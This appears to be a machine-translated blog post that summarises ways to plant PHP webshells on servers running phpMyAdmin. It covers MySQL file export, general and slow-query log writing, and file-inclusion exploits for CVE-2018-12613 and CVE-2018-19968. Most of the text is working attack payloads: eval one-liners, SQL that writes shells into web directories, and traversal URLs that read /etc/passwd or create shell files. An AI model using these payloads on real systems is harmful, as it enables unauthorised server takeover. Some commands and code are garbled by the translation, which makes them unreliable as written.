[WEB security] PHPMyAdmin background GetShell posture summary

preface:

phpMyAdmin is a MySQL database management tool based on PHP and built on the server in Web mode. It enables managers to manage MySQL database through web interface. Because of its simple and easy to operate graphical interface based on Web, it is loved by website managers.

When we get the MySQL account and password through other means and can successfully log in to the background of phpMyAdmin, we can write the webshell to the target machine in the following ways.

Local environment:

Virtual machine windows7, PHP5 6.9,phpMyAdmin4. eight

Database file export write

When the database service enables the file import and export function, use the select into outfile statement to write the webshell to the.

Utilization conditions

  • Database root privileges
  • Database field secure_file_priv has no specific value
  • Get the absolute path of the website

Utilization mode

  1. Execute the sql statement show global variables like '%secure%' to view the database field secure_file_priv content. The content of this field cannot be modified by sql statement. You need to modify the mysql configuration file my ini

    • secure_file_priv=null does not allow import or export of files
    • secure_file_priv=xxx file import and export to a path
    • secure_file_priv = the file can be imported to any path

  2. You can obtain the absolute path of the website service by means of page error reporting and php probe, and then execute the following sql statement to write the webshell.

    select '<?php @eval($_POST[shell]);?>'INTO OUTFILE 'D:/xxx/WWW/shell.php'

  3. Of course, you can also write the web shell to the fields in the table by exporting the table as a php file. Execute the following sql statement.

    CREATE TABLE hack.test( id text(500) not null); 
INSERT INTO hack.test (id) VALUES('<?php @eval($_POST[cmd]);?>'); 
SELECT id FROM hack ITO OUTFILE 'D:/phpstudy_pro/WWW/1.php'; 
DROP TABLE IF EXISTS test;

Database global log write

Save the database global log as a php file in the web directory to realize web shell writing.

Utilization conditions

  • Database root privileges
  • Get the absolute path of the website

Utilization mode

  1. Execute the following sql statement to query whether MySQL has enabled the global log and the storage location of the global log.

    SHOW VARIABLES LIKE '%general%'

  2. If the global log is turned off, you can use set global_log = on turns on the global log function.

  3. Modify or set the saving directory of the global log to the web directory of the website, and save the log as a php file.

    set global log file = 'xxx/WWW/22.php'

  4. After setting, the sql statements we execute will be recorded in the global log of the above settings. You only need to include one sentence in the sql statement.

    select '<?php eval($_POST[shell]); ?>'

Database slow query log write

Slow log query: record all execution times exceeding the field long_query_time all queries that specify a time or queries that do not use an index. By default, the slow query log is off, long_ query_ The time value is 10 seconds.

Utilization conditions

  • Database root privileges
  • Get site absolute path

Utilization mode

  1. Execute the following sql statement to query the configuration of database slow query logs

    show variables like '%slow%'

  2. If the slow query log is closed, you can set global slow_query_log=on; Turn on the global log function.

  3. Modify or set the saving directory of the slow query log to the web directory of the website, and the log is saved as a php file.

    set global slow_query_log_file='xxx/WWW/slow.php'

  4. Execute the sql statement containing one sentence, and use sleep(10) to make the sql statement a slow query statement and record it in the slow query log.

    select '<?php @eval($_POST[shell]);?>' or sleep(10);

CVE-2018-12613

Affected phpMyAdmin version: 4.8.0 / 4.8.0.1 / 4.8.1

In the above version of phpMyAdmin, due to the use of urldecode() function, secondary encoding can be used to bypass, resulting in the problem of file inclusion. The payload is as follows:

http://xx/phpMyAdmin/index.php?target=db_sql.php%253f/../../../../etc/passwd

Utilization conditions

  • The logged in phpmyadmin user needs permission to create tables and execute sql statements

Utilization mode

To exploit this vulnerability, you need to provide it with a file that can be included. Because mysql forms are stored on the computer in the form of files, you can create a data table with a field of one sentence through phpMyAdmin. By including this file, you can get the shell.

  1. Execute the following sql statement to create a table with one field as one sentence.

    CREATE TABLE `test`.`hack` (`<?php @eval($_GET['cmd']);?>` INT);

  2. Query the storage location of database table file. In windows, the suffix of table file is Frm, the file path is date / database name / table name frm. 

    show variables like 'datadir'select @@datadir

  1. Access the following url to write the shell in the root directory of phpmyadmin php. 

    http://xx/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../phpstudy/mysql/data/test/hack.frm&cmd=file_put_contents('shell.php','<?php @eval($_REQUEST[cmd])?>');

CVE-2018-19968

Affected phpMyAdmin version: 4.8.0 ~ 4.8.3

In the above version of phpMyAdmin, in TBL_ replace. In PHP, the file contains parameters that are and from the table PMA__ column_ Input in info table_ The value corresponding to transformation is spliced, and this value can be controlled by the user, resulting in file inclusion.

    if (!empty($mime_map[$column_name])            && !empty($mime_map[$column_name]['input_transformation'])        ) {        //Controllable parameter splicing $filename = 'libraries / classes / plugins / Transformations /'$ mime_ map[$column_name]['input_transformation'];             If (is_file ($filename)) {/ / no filtering and other operations are performed after splicing parameters, include_once $filename

Utilization conditions

  • The logged in phpmyadmin user needs permission to create tables and execute sql statements

Utilization mode

  1. Create database, table, field

    CREATE DATABASE test3;CREATE TABLE test3.flag ( flag int(10) );

  2. Access the following url to generate the configuration table of phpMyAdmin in database test3, and pma will be generated at the same time

    http://target.com/chk_rel.php?fixall_pmadb=1&db=test3

  3. Because the parameters of the included file are from PMA__ column_ Input in info table_ The value corresponding to transformation. Execute the following sql statement to insert data into the table. Where db_name,table_name,column_name should correspond to the table created in step 1; input_ The transformation value is the file we want to include. Here we include the data table file with the field of one sentence Trojan horse.

    INSERT INTO pma__column_info SELECT '1', 'test3', 'flag', 'flag', '1', '1', '1', '1', '../../../../../../../../phpstudy_pro/Extensions/MySQL5.7.26/data/test2/hacks.frm','1';

  4. Finally, visit the following url to include our sentence. The parameters here are db, table and fields_name corresponds to the table created in step 1. To be more intuitive, the content included here is phpinfo()

    http://target.com/tbl_replace.php?db=test3&table=flag&where_clause=1=1&fields_name[multi_edit][][]=flag&clause_is_unique=1

Keywords: PHP Database Web Security

Added by jasonok6 on Sat, 01 Jan 2022 03:48:11 +0200

Popular Keywords

©2024 Programming VIP